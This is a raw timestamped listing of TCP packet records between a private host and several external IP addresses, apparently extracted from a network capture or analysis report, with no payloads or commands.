Aug 31, 2024 15:44:20.063215971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063227892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063229084 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063239098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063256979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063256979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063277960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063333988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063344955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063355923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063369989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063378096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063380003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063388109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063407898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063429117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063493967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063507080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063515902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063525915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063535929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063541889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063556910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063574076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063631058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063667059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063831091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063841105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063847065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063858032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063867092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063879967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063909054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.063987970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.063997984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.064038992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067400932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067410946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067451000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067562103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067574978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067586899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067598104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067606926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067616940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067616940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067640066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067651987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067804098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067815065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067820072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067828894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067838907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067847967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067857027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067868948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067889929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067919970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.067964077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.067975998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.068010092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.068031073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.068150997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.068162918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.068171978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.068181038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.068201065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.068212986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.068995953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069005966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069015980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069050074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069067955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069150925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069161892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069194078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069205046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069323063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069334984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069343090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069353104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069363117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069376945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069401979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069474936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069484949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069494009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069505930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.069516897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069530010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.069555998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.070549965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070599079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.070811987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070821047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070831060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070841074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070863008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.070888996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.070981979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070988894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.070993900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071022987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.071050882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.071135044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071146011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071163893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071175098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071185112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071187019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.071196079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.071196079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071207047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.071214914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.071237087 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.084774017 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:20.085498095 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:20.088510036 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.088562012 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.088656902 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.088732004 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.090428114 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:20.100279093 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.124433041 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:20.129308939 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.146285057 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146296024 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146306038 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146346092 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.146375895 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.146424055 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146466970 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.146600008 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146610022 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146620035 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.146650076 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.146673918 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.149681091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149692059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149698019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149732113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.149760962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.149828911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149840117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149844885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149853945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149863958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.149884939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.149918079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.150698900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150710106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150718927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150753021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.150778055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.150851011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150861025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150870085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150881052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150890112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.150892973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.150914907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.150932074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152517080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152528048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152538061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152548075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152558088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152566910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152575970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152575970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152587891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152597904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152606010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152631044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152642012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152662992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152673960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152688026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152698040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152709961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152724981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152750015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152785063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152793884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.152827024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.152838945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153245926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153254986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153269053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153278112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153285980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153289080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153302908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153335094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153362036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153378963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153388977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153397083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153414011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153418064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153424978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153434992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153441906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153445005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153455019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153455973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153470039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153482914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153529882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153631926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153642893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153675079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153692961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153723955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153733969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153743029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153748989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153753996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153764009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153778076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153803110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.153966904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153978109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.153991938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154000044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154005051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154006958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154009104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154019117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154028893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154059887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154429913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154439926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154450893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154478073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154491901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154722929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154733896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154743910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154756069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154766083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.154767990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154793978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.154807091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.157790899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.157944918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.157953978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.157969952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.157996893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158026934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158107042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158113956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158124924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158130884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158171892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158277988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158289909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158308029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158318996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158329010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158332109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158339977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158349991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158350945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158368111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158377886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158405066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158574104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158585072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158596039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158606052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158620119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158622026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158631086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158642054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158653021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.158657074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158690929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.158704042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.161947966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.161964893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.161967993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162025928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.162036896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162050009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162086010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.162120104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162136078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162147045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162157059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162167072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.162167072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162179947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162190914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162213087 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.162239075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162244081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.162251949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.162281036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.162309885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164093971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164105892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164115906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164161921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164247990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164258957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164269924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164278030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164293051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164294958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164324999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164354086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164470911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164494991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164505959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164516926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164527893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164537907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164547920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164551973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.164583921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.164597034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.178850889 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.178916931 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.179060936 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.179114103 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.195219040 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.195230961 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.195240021 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.195281029 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.195303917 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.198014975 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.198024988 CEST	80	49724	185.215.113.17	192.168.2.5
